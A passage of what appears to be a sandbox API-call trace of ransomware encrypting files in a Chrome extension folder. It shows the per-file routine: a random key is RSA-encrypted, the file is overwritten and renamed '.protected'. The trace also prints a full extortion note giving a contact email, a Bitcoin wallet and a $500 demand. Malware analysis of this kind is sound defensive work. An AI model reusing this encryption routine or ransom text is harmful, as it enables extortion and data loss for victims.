returned 1 [0080.847] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.847] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.847] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.847] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.847] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.848] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\..") returned 141 [0080.848] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.848] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.848] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.848] lstrcmpiW (lpString1="craw_window.html", lpString2="Windows") returned -1 [0080.848] lstrcmpiW (lpString1="craw_window.html", lpString2="Program Files") returned -1 [0080.848] lstrcmpiW (lpString1="craw_window.html", lpString2="Program Files (x86)") returned -1 [0080.848] lstrcmpiW (lpString1="craw_window.html", lpString2="$Recycle.bin") returned 1 [0080.848] lstrcmpiW (lpString1="craw_window.html", lpString2="System Volume Information") returned -1 [0080.848] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html") returned 155 [0080.848] StrStrIW (lpFirst="craw_window.html", lpSrch=".protected") returned 0x0 [0080.848] lstrcmpW (lpString1="craw_window.html", lpString2="RESTORE_FILES.txt") returned -1 [0080.848] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.848] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.848] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.849] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html") returned 155 [0080.849] StrStrW (lpFirst="craw_window.html", lpSrch=".txt") returned 0x0 [0080.849] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html") returned 155 [0080.849] StrStrW (lpFirst="craw_window.html", lpSrch=".rar") returned 0x0 [0080.849] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html") returned 155 [0080.849] StrStrW (lpFirst="craw_window.html", lpSrch=".zip") returned 0x0 [0080.849] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x32a, lpOverlapped=0x0) returned 1 [0080.850] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xfffffcd6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.850] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x32a, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x32a, lpOverlapped=0x0) returned 1 [0080.851] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.851] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.851] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.851] CloseHandle (hObject=0x164) returned 1 [0080.851] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.protected") returned 165 [0080.851] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.protected")) returned 1 [0080.852] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0080.852] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0080.852] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\RESTORE_FILES.txt") returned 156 [0080.852] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.852] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.852] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0080.853] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.853] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0080.854] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.854] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0080.854] CloseHandle (hObject=0x160) returned 1 [0080.854] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.854] lstrcmpiW (lpString1="images", lpString2="Windows") returned -1 [0080.854] lstrcmpiW (lpString1="images", lpString2="Program Files") returned -1 [0080.854] lstrcmpiW (lpString1="images", lpString2="Program Files (x86)") returned -1 [0080.854] lstrcmpiW (lpString1="images", lpString2="$Recycle.bin") returned 1 [0080.854] lstrcmpiW (lpString1="images", lpString2="System Volume Information") returned -1 [0080.854] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images") returned 140 [0080.854] lstrcmpW (lpString1="images", lpString2=".") returned 1 [0080.854] lstrcmpW (lpString1="images", lpString2="..") returned 1 [0080.854] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\*") returned 142 [0080.854] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0080.858] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.858] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.858] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.858] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.858] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.858] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\.") returned 142 [0080.858] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.858] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.858] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.858] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.858] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.858] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.858] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.858] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\..") returned 143 [0080.858] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.858] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.858] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.858] lstrcmpiW (lpString1="flapper.gif", lpString2="Windows") returned -1 [0080.858] lstrcmpiW (lpString1="flapper.gif", lpString2="Program Files") returned -1 [0080.858] lstrcmpiW (lpString1="flapper.gif", lpString2="Program Files (x86)") returned -1 [0080.858] lstrcmpiW (lpString1="flapper.gif", lpString2="$Recycle.bin") returned 1 [0080.859] lstrcmpiW (lpString1="flapper.gif", lpString2="System Volume Information") returned -1 [0080.859] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif") returned 152 [0080.859] StrStrIW (lpFirst="flapper.gif", lpSrch=".protected") returned 0x0 [0080.859] lstrcmpW (lpString1="flapper.gif", lpString2="RESTORE_FILES.txt") returned -1 [0080.859] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.859] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.859] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif") returned 152 [0080.859] StrStrW (lpFirst="flapper.gif", lpSrch=".txt") returned 0x0 [0080.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif") returned 152 [0080.859] StrStrW (lpFirst="flapper.gif", lpSrch=".rar") returned 0x0 [0080.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif") returned 152 [0080.859] StrStrW (lpFirst="flapper.gif", lpSrch=".zip") returned 0x0 [0080.859] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0080.861] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.862] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0080.862] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.862] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.862] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.862] CloseHandle (hObject=0x164) returned 1 [0080.862] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.protected") returned 162 [0080.862] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.protected")) returned 1 [0080.863] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.863] lstrcmpiW (lpString1="icon_128.png", lpString2="Windows") returned -1 [0080.863] lstrcmpiW (lpString1="icon_128.png", lpString2="Program Files") returned -1 [0080.863] lstrcmpiW (lpString1="icon_128.png", lpString2="Program Files (x86)") returned -1 [0080.863] lstrcmpiW (lpString1="icon_128.png", lpString2="$Recycle.bin") returned 1 [0080.863] lstrcmpiW (lpString1="icon_128.png", lpString2="System Volume Information") returned -1 [0080.863] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png") returned 153 [0080.863] StrStrIW (lpFirst="icon_128.png", lpSrch=".protected") returned 0x0 [0080.863] lstrcmpW (lpString1="icon_128.png", lpString2="RESTORE_FILES.txt") returned -1 [0080.863] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.863] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.864] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.864] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png") returned 153 [0080.864] StrStrW (lpFirst="icon_128.png", lpSrch=".txt") returned 0x0 [0080.864] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png") returned 153 [0080.864] StrStrW (lpFirst="icon_128.png", lpSrch=".rar") returned 0x0 [0080.864] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png") returned 153 [0080.864] StrStrW (lpFirst="icon_128.png", lpSrch=".zip") returned 0x0 [0080.864] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x1109, lpOverlapped=0x0) returned 1 [0080.868] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffeef7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.868] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x1109, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x1109, lpOverlapped=0x0) returned 1 [0080.869] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.869] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.869] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.869] CloseHandle (hObject=0x164) returned 1 [0080.869] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.protected") returned 163 [0080.869] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.protected")) returned 1 [0080.870] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.870] lstrcmpiW (lpString1="icon_16.png", lpString2="Windows") returned -1 [0080.870] lstrcmpiW (lpString1="icon_16.png", lpString2="Program Files") returned -1 [0080.870] lstrcmpiW (lpString1="icon_16.png", lpString2="Program Files (x86)") returned -1 [0080.870] lstrcmpiW (lpString1="icon_16.png", lpString2="$Recycle.bin") returned 1 [0080.870] lstrcmpiW (lpString1="icon_16.png", lpString2="System Volume Information") returned -1 [0080.870] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png") returned 152 [0080.870] StrStrIW (lpFirst="icon_16.png", lpSrch=".protected") returned 0x0 [0080.870] lstrcmpW (lpString1="icon_16.png", lpString2="RESTORE_FILES.txt") returned -1 [0080.870] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.870] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 